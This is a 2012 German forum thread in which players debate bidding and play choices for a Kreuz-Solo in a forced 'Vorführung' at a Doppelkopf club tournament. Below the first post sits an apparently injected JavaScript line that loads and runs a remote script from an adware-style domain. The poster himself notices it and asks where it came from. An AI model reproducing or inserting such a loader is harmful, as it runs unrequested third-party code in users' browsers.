Doppelkopf-Strategien: Vorführung beim Löwen-Vereinsturnier in Braunschweig

Tront, 02. September 2012, um 00:04

In der 2. Runde vom Löwen-Vereinsabend in BS war es mal wieder soweit, dass ich in die Vorführung kam.

Folgendes faires Blatt erhielt ich dann:
Herz-ZehnKreuz-DameKaro-DameKreuz-BubePik-BubeKaro-BubeKreuz-ZehnKreuz-KönigKreuz-KönigKreuz-NeunKaro-AssHerz-Neun
Alternativlos ein Kreuz-Solo.
1. Stich: Karo-AssKaro-NeunKaro-KönigKaro-Neun
2. Stich: Herz-NeunHerz-AssHerz-KönigHerz-Ass mit Kontra von Spieler 2
3. Stich: Pik-AssPik-ZehnPik-KönigKreuz-Zehn mit keine 90 von Spieler 3

Nun habe ich genau 50 Augen gegen die keine 90-Absage liegen.
Sagt man das Re dagegen?

a) eher ja
b) eher nein

Ergebnis folgt!
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

EvilNephew, 02. September 2012, um 00:09

Ich spiele 2. Herz9 nicht, sage aber das Re klarerweise.

Tront, 02. September 2012, um 00:15

Ich wollte aber genau diese Sitzpostion nach dem 2. Stich haben. Sonst sagt ja niemand die keine 90 ab, wenn sie bereits sehen, dass ich Pik steche.

Wusste aber schon, dass dieser Einwand wohl kommt, nachvollziehbar ja, nur auch berechtigt?

Dieses Spiel musste sogar Spieler 2 sein blankes Herz-As legen, sonst kommt vielleicht wirklich jemand anders weiter. Aber das ist auch noch die Frage, ob das so gespielt wird. Spieler 2 gilt nicht als so spielerfahren.

Tront, 02. September 2012, um 00:17

Wo kommen eigentlich diese merkwürdigen Sonderzeichen und Funktionen hinter meinem Ausgangstext her? Vor mir sind sie jedenfalls nicht.

EvilNephew, 02. September 2012, um 00:18
zuletzt bearbeitet am 02. September 2012, um 00:18

Das Ding ist, wenn ich 10Tr mit Dulle und Alter habe, können die Gegner kaum die Karten haben, Co 90 zu sagen. Ich spiele daher auf 120 bei gutem Fehl- und Trumpfsitz...

Tront, 02. September 2012, um 00:21

Endlich mal jemand mit optimischtischer Grundeinstellung zu den Farbsoli! Meinst du aber wirklich, man kann 120 Augen erreichen, nachdem (wenn auch vielleicht fehlerhaft überzogen) die keine 90-Absage erfolgte? Bei traumhaftem Sitz vielleicht.

Ex-Füchse #17070, 02. September 2012, um 00:30

Den Hz Anschub für die 90 Ansage finde ich Klasse.
Es läuft wohl darauf hinaus ob Spieler 3 als Fehl nur noch 1 oder 2 Hz hat. Theoretisch sollte estrotzdem reichen, wenn Spieler 2 nicht die Dulle hat.
Also Re und Angst.

EvilNephew, 02. September 2012, um 00:46

Ich muss im 2. Stich überlegen.

Variante 1: mit Trumpfnachspiel auf 120 spielen
Variante 2: mit Herz9 auf die 90-Absage der Gegner hoffe.

Ich finde die 120 durchaus realistisch, daher hätte ich mich für die erste Variante entschieden.

Dass man die 120 nicht mehr erreichen wird, wenn der Gegner die 90 absagt, ist mir schon klar, aber das weiß ich doch vorher nicht. Insofern ist dein gesamtes Posting unlogisch, Tront, weil du von Dingen ausgehst, die du noch gar nicht wissen kannst.

Tront, 02. September 2012, um 00:58

Was ist denn so schlimm daran, dass ich meinen Herz-Fehl-Abgeber verrate, um in eine gute Sitzposition zu kommen? 120 Augen zu erzielen, halte ich dagegen für äußerst unrealistisch.
Egal, ob jemand etwas an- oder absagt.

Das Solo spielst du doch niemals freiwillig als Trumpfsolo und nun willst du plötzlich auf 120 kommen, nur weil es eine Vorführung ist, das verstehe, wer will.

EvilNephew, 02. September 2012, um 01:38
zuletzt bearbeitet am 02. September 2012, um 01:38

Tront, ich falle grad etwas vom Glauben ab.

Natürlich spiele ich den nicht freiwillig als Trumpfsolo. Warum?

Für ein Trumpfsolo braucht man eine sehr hohe Gewinnwahrscheinlichkeit, dass es sich gegenüber dem Normalspiel lohnt. Dazu können Trumpfsoli deutlich schräger sitzen als Fleischlose oder Bildersoli.

Deswegen werden Trumpfsoli selten gewählt, aufgrund des Erwartungswertes, nicht weil sie per se schlecht sein.

In einer Vorführung gilt die Abschätzung gegenüber den Normalspiel nicht! Daher gelten für Trumpfsoli in Vorführungen völlig andere Maßstäbe.

akaSilberfux, 02. September 2012, um 10:29

Mit der Hand kann man die Gegner ohnehin nicht vom Abspiel aller Farben in der von ihnen erwünschten Reihenfolge ausschließen. Mit dem Herzanspiel hat man die beste Chance, wenigstens einmal in einer erfreulichen Sitzposition zu sitzen.
An eine Gewinnchance von über 50% glaube ich nicht, weswegen ich auch kein Re sagen würde. Wenn man tatsächlich an eine Gewinnchance von über 50% glaubt, kann man den Herz ebenfalls gut spielen, weil man dann noch Re auf das wahrscheinliche Kontra geben kann.

Mit den 50 Augen sage ich das Re gegen die 90.

EvilNephew, 02. September 2012, um 11:54

Ich glaube auch nicht an eine 50%-ige Gewinnchance. Ich sehe sie bei 20-30%. Das reicht mir aber, um die 120 zu versuchen (ohne Re) und nicht auf abgesagte 90 zu spekulieren.

CaptainHook, 03. September 2012, um 07:21

ok, es mag eine Vorfuehrung sein, aber die k90 sind schon dreist. Wieviel Pech soll am Re-Mann schon kleben, oder ist da auch ein bisschen der Versuch dem Re-Mann eine zu klatschen?

Tront, 03. September 2012, um 15:21

Das wurde noch ein mühevoller Arbeitssieg. Auf die keine 90-Absage gab ich das Re und erzielte letztendlich "nur 94 Augen". Die Trumpfverteilung war 6 - 8 - 2 bei den Gegnern und im weiteren Verlauf wurden die 2. Läufe vor- oder übergestochen.

Ich meine die keine 90-Absage von Spieler 3 war gar nicht so unberechtigt, da Spieler 2 bereits das Kontra gab, das Kontra von Spieler 2 war eher etwas fragwürdig, da er selbst keine größeren Stärken mehr aufwies. Der Achttrümpfer hielt u.a. Dulle, Kreuz-Dame, Pik-Dame und die Spiele, wo ich einen Pik-Lauf bediene, gewinnt Kontra aus seiner Sicht wohl auch alle zu unter 90.

Im Nachhinein war mein Re gar nicht nötig, da ich zufällig mit 29 Punkten (jetzt auch mit 35 Punkten) bei 13 Teilnehmern den Tagessieg errungen habe.
Ohne die keine 90-Absage wäre ich jedoch nur 5. geworden (27 Punkte weniger, also wäre +8 mein Endergebnis gewesen).

zur Übersichtzum Anfang der Seite